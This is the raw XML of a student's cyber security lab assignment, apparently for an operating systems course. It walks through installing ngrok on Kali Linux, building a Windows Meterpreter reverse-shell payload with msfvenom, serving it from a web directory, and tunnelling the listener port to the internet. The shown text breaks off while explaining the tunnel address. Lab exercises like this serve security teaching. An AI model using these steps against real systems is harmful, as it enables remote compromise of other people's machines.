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7DCEA" w14:textId="77777777" w:rsidR="00185BCB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:jc w:val="both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22D87550" wp14:editId="6519355C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>869315</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>508000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5911215" cy="3815080"/>
            <wp:effectExtent l="0" t="0" r="6985" b="762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2BBA6" w14:textId="77777777" w:rsidR="00185BCB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="LightShading-Accent4"/>
        <w:tblW w:w="10020" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10020"/>
      </w:tblGrid>
      <w:tr w:rsidR="00185BCB" w14:paraId="631C4BF1" w14:textId="77777777" w:rsidTr="00185B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20" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32C5A373" w14:textId="77777777" w:rsidR="00185BCB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:before="10"/>
              <w:ind w:firstLineChars="200" w:firstLine="1124"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>BS Cyber Security Department AU</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F9A3C3C" w14:textId="77777777" w:rsidR="00185BCB" w:rsidRDefault="00185BCB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B05A1E9" w14:textId="77777777" w:rsidR="00185BCB" w:rsidRDefault="00185BCB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10140" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5070"/>
        <w:gridCol w:w="5070"/>
      </w:tblGrid>
      <w:tr w:rsidR="00185BCB" w14:paraId="0CA170FF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="701"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="522158DC" w14:textId="77777777" w:rsidR="00185BCB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Registration ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="645ADB71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233026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00185BCB" w14:paraId="13C706FC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="701"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28788C2D" w14:textId="77777777" w:rsidR="00185BCB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By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A67443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Muhammad Sohaib Rafiq </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00185BCB" w14:paraId="68995141" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="701"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5563A073" w14:textId="77777777" w:rsidR="00185BCB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To</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A0F50BD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Iram Fatima Hashmi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00185BCB" w14:paraId="07823245" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="721"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CCF0859" w14:textId="77777777" w:rsidR="00185BCB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Date of  Submission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D802117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12/02/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00185BCB" w14:paraId="7FE5DB87" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="721"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CF3C69" w14:textId="7968098C" w:rsidR="00185BCB" w:rsidRDefault="000B4C9A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Assignment</w:t>
            </w:r>
            <w:r w:rsidR="00000000"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NO.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314D5C97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</w:tr>
      <w:tr w:rsidR="00185BCB" w14:paraId="0333FEBD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="736"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3023BF9B" w14:textId="77777777" w:rsidR="00185BCB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText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Subject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5070" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="667A76FF" w14:textId="77777777" w:rsidR="00185BCB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText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OS LAB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CC053ED" w14:textId="77777777" w:rsidR="00185BCB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="00185BCB">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1460" w:right="1320" w:bottom="280" w:left="1340" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgBorders w:offsetFrom="page">
            <w:top w:val="single" w:sz="48" w:space="24" w:color="5F5F5F"/>
            <w:left w:val="single" w:sz="48" w:space="24" w:color="5F5F5F"/>
            <w:bottom w:val="single" w:sz="48" w:space="24" w:color="5F5F5F"/>
            <w:right w:val="single" w:sz="48" w:space="24" w:color="5F5F5F"/>
          </w:pgBorders>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099840EA" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="274" w:after="206"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 1: Install Ngrok on Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF1006" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E9117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Ngrok creates a secure tunnel to expose your Kali machine to the internet (useful if Windows is on a different network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441686CD" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172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A. Download Ngrok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C57141" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Download the Linux version (ARM64 if on Raspberry Pi, otherwise AMD64):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ABD5BC" w14:textId="55EE7570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wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00084F42">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          </w:rPr>
          <w:t>https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B81AE4E" w14:textId="18784CED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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EFB2750" wp14:editId="07671409">
            <wp:extent cx="6083300" cy="3573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E7A7" w14:textId="56F98DB6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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EBE5B21" wp14:editId="3537BF0F">
            <wp:extent cx="6083300" cy="1636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0CFE" w14:textId="77777777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</w:p>
    <w:p w14:paraId="25337347" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Extract &amp; Install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DA2670" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:afterAutospacing="1" w:line="189" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="494949"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d813de27"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="525252"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72E10D" w14:textId="36A96CB4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tar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:t xml:space="preserve"> xvf ngrok-v3-stable-linux-amd64.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC0F75" w14:textId="66C3D1EC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 w:rsidRPr="00E91172">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:noProof/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="015931EA" wp14:editId="55DC960E">
            <wp:extent cx="5563376" cy="75258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B53" w14:textId="0A756BD6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Style w:val="token"/>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
        <w:t>mv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:t xml:space="preserve"> ngrok /usr/local/bin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B69A07" w14:textId="593FDB9A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</w:p>
    <w:p w14:paraId="01D893B7" w14:textId="139FC55A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 w:rsidRPr="00E91172">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:noProof/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7362D4B9" wp14:editId="3187C4E7">
            <wp:extent cx="4115374" cy="647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A599" w14:textId="77777777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</w:p>
    <w:p w14:paraId="6DF8038E" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172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B. Authenticate Ngrok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAD47B5" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Get your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>authtoken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t> from </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="3B82F6"/>
            <w:bdr w:val="single" w:sz="12" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Ngrok Dashboard</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D6632" w14:textId="011BA187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Style w:val="token"/>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:t xml:space="preserve">ngrok config add-authtoken </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10653A" w14:textId="614E9D3B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</w:pPr>
      <w:r w:rsidRPr="00E91172">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FF2CF7B" wp14:editId="2282CF86">
            <wp:extent cx="6083300" cy="1241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D4F" w14:textId="4099A9F6" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:spacing w:before="480" w:after="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A1FDF8" w14:textId="4DECCF17" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="274" w:after="206"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Step 2: Creating a Malicious File (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715640AD" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172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Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DBB1EB" w14:textId="77777777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>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57453ED0" w14:textId="10D181E5" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Create a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Windows payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t> (Meterpreter):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BB38C" w14:textId="77777777" w:rsidR="00E91172" w:rsidRPr="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="429" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91172">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>• Msfvenom --platform windows –p windows/x64/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4943DB06" w14:textId="77777777" w:rsidR="00E91172" w:rsidRPr="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="429" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91172">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>LHOST=IP LPORT=4443 EXITFUNC=thread –b ‘\x00’ –f exe-only –o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070EE2E" w14:textId="0E3F585C" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172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Fonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E91172">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>/var/www/html/</w:t>
      </w:r>
      <w:r w:rsidR="00935A7C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2D6A69" w14:textId="7E406327" w:rsidR="00935A7C" w:rsidRDefault="00935A7C" w:rsidP="00E91172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Fonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935A7C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F4DF685" wp14:editId="4ECBDF3F">
            <wp:extent cx="6083300" cy="666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C542" w14:textId="77777777" w:rsidR="00935A7C" w:rsidRDefault="00935A7C" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0" w:line="429" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038304B2" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="274" w:after="206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lastRenderedPageBreak/>
        <w:t>B. Start Ngrok Tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5457DB42" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172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Expose Kali’s port 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4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t> to the internet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E92E825" w14:textId="422432A5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Style w:val="token"/>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="B76B01"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:t xml:space="preserve">ngrok tcp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="B76B01"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7AA3A" w14:textId="77777777" w:rsidR="00935A7C" w:rsidRDefault="00935A7C" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="302" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B42D5DC" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="302" w:lineRule="atLeast"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp://0.tcp.ngrok.io:12345 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="494949"/>
        </w:rPr>
        <w:t xml:space="preserve"> localhost:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E132B6C" w14:textId="77777777" w:rsidR="00E91172" w:rsidRDefault="00E91172" w:rsidP="00E91172">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:numPr>
          <w:ilvl w:val="1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="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ECECEC"/>
        </w:rPr>
        <w:t>0.tcp.ngrok.io:12345</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t> is your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="404040"/>
        </w:rPr>
